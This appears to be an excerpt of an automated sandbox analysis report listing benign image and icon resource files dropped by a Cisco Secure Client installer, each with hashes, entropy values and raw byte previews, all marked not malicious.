                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-PQUT3.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83111
                                                                                                                                      Entropy (8bit):7.138058183615623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                      MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                      SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                      SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                      SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......+........%....pHYs...#...#.x.?v.. .IDATx...kn...`..^..#?N...$..d)..c.5d/..ASy.q$Y....y...3.D........................................................................................E.....GW.....P..Z.nC........0\./_Ow?v:...`..x.j=..9.......@....5q....P5.&...hl.....&...hl.....&...hl.....&...hl...M..\v.......P.{.g.h}.;2.@...e#........Xr8.n.....s.er..<.4...fNi......H3.r:.....?u$`'.~.~...dsHN.<.s}.0.qy...x.A<..}7L.y....}^~...].w([U.M`.5..1... .pB.F.>IMc..|..y.].......7...^46.a.....p.c..-...{.`.....,..#x...>I.:......a.........|M.-..k..7:...;...C.........?>~>..)........o9(O.i.'.{.n..~.q....2Q.....W&.....R....Il.....;..~kH|_.R......O....2..}jp....f.1!%..OY....n...F.lfL....W....'.CH,.....g/..y>>~.+*j...$e........Mb..;.........Z...A.:.~...Y|.o1P.A.$...)....~....S;.RR..@...W.&.}.q=.N...:[.C1.5.=...r.U&+._.z.O~o........m......}..t.vcR....u..{...&P..7.......c<....15.?u..5..U.c..........:.*.N.MhPw.=..K..y..>vc.....{;....F>..k......,.-..N...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-QM100.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76615
                                                                                                                                      Entropy (8bit):6.470162664157233
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                      MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                      SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                      SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                      SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....8.(`.T.E...D0..n.............\..;..`G.'...2.....W/.?[.$.y..j...gY.......................................................................................................................W..Tus7..%......m.....Bx.Bx.w......P.QU7.B.gW...k]?;T....J.s....i`9g...m...R{,1e...S...+3V.P..@......"......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!.............G.<...k~..~.B.p....}.d(........>..V.7......~.&..m[...(.{s[.......S..=.0.>..........0p.......aP.4...R.&...I.K.s......=...=.K.Vu.".b.l...Q.(.D!......@....Q.(.D!......@....QX..D......1\h....}}...;}|>.e....;..\t.tE.........9"}|9..&.m.S+...-m:.C3y.K..!..b....mi.....b.>~;..f...f.....S.P...g.......P..B@. ....(.....P..B@. ....(.....P..B@. ....(.....P ....%.P...e......u;.k...&.......=.....h..2(....=..%..A....yH..-..}<...IX.=......yO..U....>yImj[......'.;...B@...i..-.S.n..tnk..m.:..>v......5.g.SI'..f.K.U..e.{......6...+.3y..-:.x..f...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-RBN70.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4117
                                                                                                                                      Entropy (8bit):7.943813748161345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                      MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                      SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                      SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                      SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.l..u~s........)..(.,KQd.Ih...D5.q..(..@."6..E[.P...r.F..5..H..@Z'h....(:...P4.S..]..=..{..R.D.....@.;...w|.{..............@.DW.8........`.@/.!.N....o..r..D.\..]..? .";U_U...R../q.b.e.e..%-S..J..._1.....0...P(.....!........U.......kg.6...-....^.m...8.....E..3E.r}...._..fg&..............f1.....B.u\.g....zz.w...NWoc.... ...m.....9Z.'.....l..a.L..?.KX?>?V.:84X.../..7...._....#..zT.~.{wu..B......VI.l...e..F^.l...Hy...1..4...[.p......S....j./.t.0..c..O..Z6wGiw'..h........8..`w.g.5.Q..&*.Gxd...@3,..z...8.T...,..VAP$(.tm... .. ......*....\.`.Q.hQ.I\v.].....N..............}...@...%...........x.x.DU.e$..*m.5%..(.A".X.d@r...d.l....:.B..Q..U.H.5....X...k.'...p.>.ZCWo..{...j.2...[....Fg...0.\T...4d.'....%H.....@.k-...4!.+..B..Obr.=948..BgK5?..;Sv`.....)\d........u..}.pw..G.s.TV..R.<.7S......0}.......h.9..*.NG... W4..<*.!..>.U....;c.>..Z.sR..<w......I.....G:.>..#"...%...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-S8DR5.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3882
                                                                                                                                      Entropy (8bit):6.743390042757195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                      MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                      SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                      SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                      SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-S8MVN.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10710
                                                                                                                                      Entropy (8bit):7.9641316394298025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                      MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                      SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                      SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                      SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx..]{..U._<..Th.CK=..R..V.GOWH.G3"8.5L.....;b............3.:S....s=....G].vX.w....W....Z?.^{..k..{.........w}...%y`...]...B6..........K.S..j.G."..?>.c..~../(/&}................p..B~..7...t.\... .j......,.......;.]M......`.o.p..?...98.c.%.6.....g...&.............;..F..!.fL%/.j@:.`.o....5_.b2...5|h...UoI/....W..W...}.....<.<\0.p.N.,Y......M...KI.O"C.x.}$.....=.V...E.........HT....Ep.m.~.[(....Y.f.'g*_...NG..S....m.2.<..[.(G.m..[.1....S........|...[.o.#eW....F.-.a.+...^.Rp...L.ue.<+./.......?..Lke.b.r.....V..G...$..6.]:.s...+..F...#O....=Y.;..g..l..,c....DWw.hB....B..l...`..;".wV.#..{.q.........v.].Z..C...T.`.-}M#...........{.(t.E.Om. ..=My..V...4.\.Ep.........W.)..x.W..f..7{.IG..-.....Z..{.l..F.,..f^r...V.9..H../.....$.&>..U...Msx.68.....S{...Z....v..v....O,.ps2E.......>..M_.........6H.hl.;Q.d....h.H...V..W...iH..{..2Q.zmp..;.Z~].c.!.Y.}.6.P......^kC..t...V.0.^.l.NMp..o..Y.8...Q

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-SHCKC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4267
                                                                                                                                      Entropy (8bit):7.94257084168463
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                      MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                      SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                      SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                      SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..Zyl..u.s......x..$J.i).l.......6..8.k.h`....(Z.UZ.Q.-....4n...l...6r.@r.#J.K.M..O.7w.......{..R.E.....@.vvw...{..~..~....u7.).......Np..r..K.(f..%!.LB1k....p.......E..l.........x.."{$.Wl..hY.lAO.R..B*>d....c...D?.........*.......=...[....N....;.|..d.T.&..q..."....I...pi8...?...6...s.R.....z.......U5.pM{.j..C..k..wW.....W.e..X.....9"...Q.@.y.G.,.x<....Y...]....\.wn.........YsI..+.....m.?.o..^...`@:]...w#.sv....x....@..0As....!...j.^.q.~..G..z~x....q.....J..a......6=td.=.M..Z.k*..,.#......i.......xP......S.A. o.y.`A*.C.i%..5~......_.Y.?/.%.=z..dr...N..X.lz.....|......x.s6.d.". ........l....@Te.C.)..E..@..%.$..e.&..r..g...9.]k}.t..R...%..6..{............G^.o....F.!.F..Ar*`.<....L...&......S..y|..,$.Yp......A.X.t..N..q.....d.p0.A[S....m...2.g..nr...U...../.vu.........Z".Cl6.....Dt...s2.....l.`.(Z.x.2h...3.f....M.<.F.H)......q.H..p...n.M.......T..._..v?..5(x....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-SHEAG.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.612237043911612
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                      MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                      SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                      SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                      SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ..............................................................@...@...@...@...@...@...@...@...@...@...@...@...@...@...........................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................................................P.....@...s...s...s...s...s...s...s...s...s...s...s...s...@.........P.................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................................................................X5...@...s...s...s...s...s...s...s...s...s...s...s...s...@..X5...........................................................xh.M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'...xh..............................................xh.M'..M'.......@...s...s...s...s...s...s...s...s...s...s...s...s...@..z]J.M'..M'...xh................................P........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-SS12K.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2465
                                                                                                                                      Entropy (8bit):7.9078675566370515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                      MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                      SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                      SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                      SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~....SIDATx..\.l.U...d..v..P(t[..DDJ....-..."...5....1T.Q"i..?.....jK..ZS....) .*..6........s...e.3o...........s..{.*r... ..2.(.o}|..."...6l..]n....y..t".ID.D...l..ql;vt.y...u\g..:..+{......I5DT..5.t...!....8)K.:RS..!..-...S.0....e[..*8Y...E)A......H...y.yL%*.uU..S].>AV.'.\%QJ..&..)z...s.U|.!...i..5....e. .?.S*#.t....#..m...ol.D.7..CM..B.WM%|.L...E.)..P..6...A.V.d. .?....T3oF.=...JJL.qI....C.{..v..W.}.PS..........#........n%=.`.]}.._H...S..l.eL.5.9..;...x.....!).....T...q.....<.VU...n..J....i....g.{.m2$.61.9.....I..&7k.*.|.'m5s.).]...7....`n$.$C.....X!)....a......9..q...0......$..9.....A......!m...:.{.....T..LZ.....&|.H...A.0..8.O....?".,..N.V..._6R...X`.w...gx.5U....I..OIV.J...z.i.H..k...\..U.. >}..A`yi...Ct.y..8..#@Q8.'&.KK.D0y...2..i..$....Q...."j.....[Fg..0....,(9o.".8]S.#.9"ZSY.....Dtu_..ZO...G.9f.".(.$M.t+...e9&...L..NDk....$......|.l~..O`.....G...'.,`.D3...*.\.g.VEqQ."..C..,.*9..M.y..~."..A.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-SUI3L.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):291
                                                                                                                                      Entropy (8bit):6.344520469543007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                      MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                      SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                      SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                      SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............}\.....gAMA......a.....pHYs...........~.....tIME........w.e....tEXtComment.Created with GIMPW.......tEXtSoftware.Paint.NET v3.5.100.r....gIDATHKc`...!@........0.a|Rh..r....0E0>)4.}=..t.....0W....x}......a.`|R...dTw..........B.u..-.z...8.C..^...Y.......IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-SVH1J.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1264
                                                                                                                                      Entropy (8bit):7.787798189239225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                      MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                      SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                      SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                      SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...C...@.....A^......pHYs...#...#.x.?v....IDATx..\;R.A.m0.3...8.*C...o.@'.D.%N.:."..q..*o,...@........~.Z-.....J.*}fGo..t..h.jB.D]"b.#"zCD..+.D..,.,...X).q.......:.."...}#.Y:X.........!.1":...1w.`9.=p02.$bw..VP....C..M...F..`.\....w /2.$..5.bQ.^.C[.X.t.\.N..8....[XCQ...Q&.<~...'\C..s.j%.d@ ..8..y.0.9#....0-......q...]..1../....).t.<....L.V....@)N..HQ..+B....9W|d.K..^8..W2-!.}...... Z...e..jB.).9S..Uc.PsF...r...n.+.....:2n..".....!l....E.%'.I.......!$.."._....*....H...?.....HD......7F.u.+...Ke.+.S2`.C...M.........2F2.p.q...ZU\$..E.UX....p..4M..f.Pb...2..k..J..,.D....e.E....i..zc@...tX...s.t....>4"CM...47}....p...\..x#.(....96.yd...._.@.6...C7..2.P....QD...3...7z..d`...3..]...+.b.`k..5....I.#K.V.%.F.h6`. f...g.....G..l....~"l..17.{. m.......1S..$z@.....4....5.........ks.E....._....52L.T.....m..`..;.r....&..p-...}.s.l.S....d%.q..[2...a.. ..|..4.1...v.....j.|b..d0\.....{..6.E.*22.S"..JHa.U.\f.. c.m..!t.HH.MS.sU.P&.Y.!_2.^..V..(S..=

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-T7SD3.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76349
                                                                                                                                      Entropy (8bit):6.476357962983417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                      MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                      SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                      SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                      SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............:z....pHYs...#...#.x.?v.. .IDATx.....H. Pi....`...`....<.`!d.`.........X.k.x@y.....KM.{.T.H.Dt..4\.2.....................................................................................................................X.V.<.n........a.9\ ...Af[.7K.C.q.C.K....T..P7.N.k...P.S..O...5..'....1...<8[.8$......@....A.(..!......@....A.(..!......@....A.(..!......@....A.(...j,.....}.q..}...ZU.....y.......c_..U...\].....k.2\.}.j..V7........K.....C.|..{.p^/.m".'.....q...>..J..}wJ.v.....A.-O=oA%o.J.......SG.H@.h[.X7|....P .O..%.P..B@. .... .....P..B@. .... .....P...~(g.k..KjoW...zt....v....('..........2..3.}k.... .-.7.:ts-h..u...X...,w..V..;..i.3.!.<.>..mg..{7>C@....Ye...A@...rS3.A@. .... .....P..B@. .... .....P..B@. .... .....P..B@.t....y......!G...9gg...B.../g..;.%.|p...S..5....&.o'.......6.('8.BZm?...}..T.S:.Z.<..:v..=.5.....}ku.D.3.C_.......F.r9....*.zG=.....c....q.......j?....r.\.G...[^..!......@....A.(..!......@.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-U4KPC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8594
                                                                                                                                      Entropy (8bit):7.973082494080156
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                      MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                      SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                      SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                      SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx....U..G!o.<.........Mi@...t+iV@[H.X..-MZ...6E.lZ...X.>%jW..&..]-P.JV.<..Z...Rt..@M.mM7...9sg..;s.{....s.3....o~.H...w.......-...-.<.......4.5.y..d'....7......b..{.....]7..?u......}5y...M.k...`..U.w.............>.}...h..s.... ....Gu!....[tc ;....F...v...k.{.x.'U..;..-..'...B.Y....I...R..0Zw...`u.C...|].....m...y...V.I..?.L.;.8.....Ez&\h.'y.........;...-...G.y/9*....}...S.@..+._..*..a.9WZ...._W+-.B.>.m..:....o..*\...<Mu`.a.........o..w.]@=/_|9Y..~....b...>.dk..4VY...5...v+r"...qw....sm..&.]."y.x..I...kt!fw..Xx.....\.,}.=.gH..AgA..xV.\t..".0.(...8a\.QJ..k..Hu.*.........E..l/...4=x.54l..$j.k3M.../.l|r.=...K.Rt.Z..........N....v...z..S...1^..u...P..j.BF.W...iH.....n).....=.s8...!bx.N<.\]....,.6..`..b~8...[..X..o..R.X.`!BiZ.0...t.im..o....n...s...|W..<....K.by..o..l......{.KMe.....g.n5..b+w.B.Ilo...M?.V:X...!..&.KJ...?...Lj......._.~...l.}...=..HO.@?!d_.O.Vy.....QI=..b4...8t

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-UVJKG.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12258
                                                                                                                                      Entropy (8bit):7.976396258951981
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                      MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                      SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                      SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                      SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                      Malicious:false
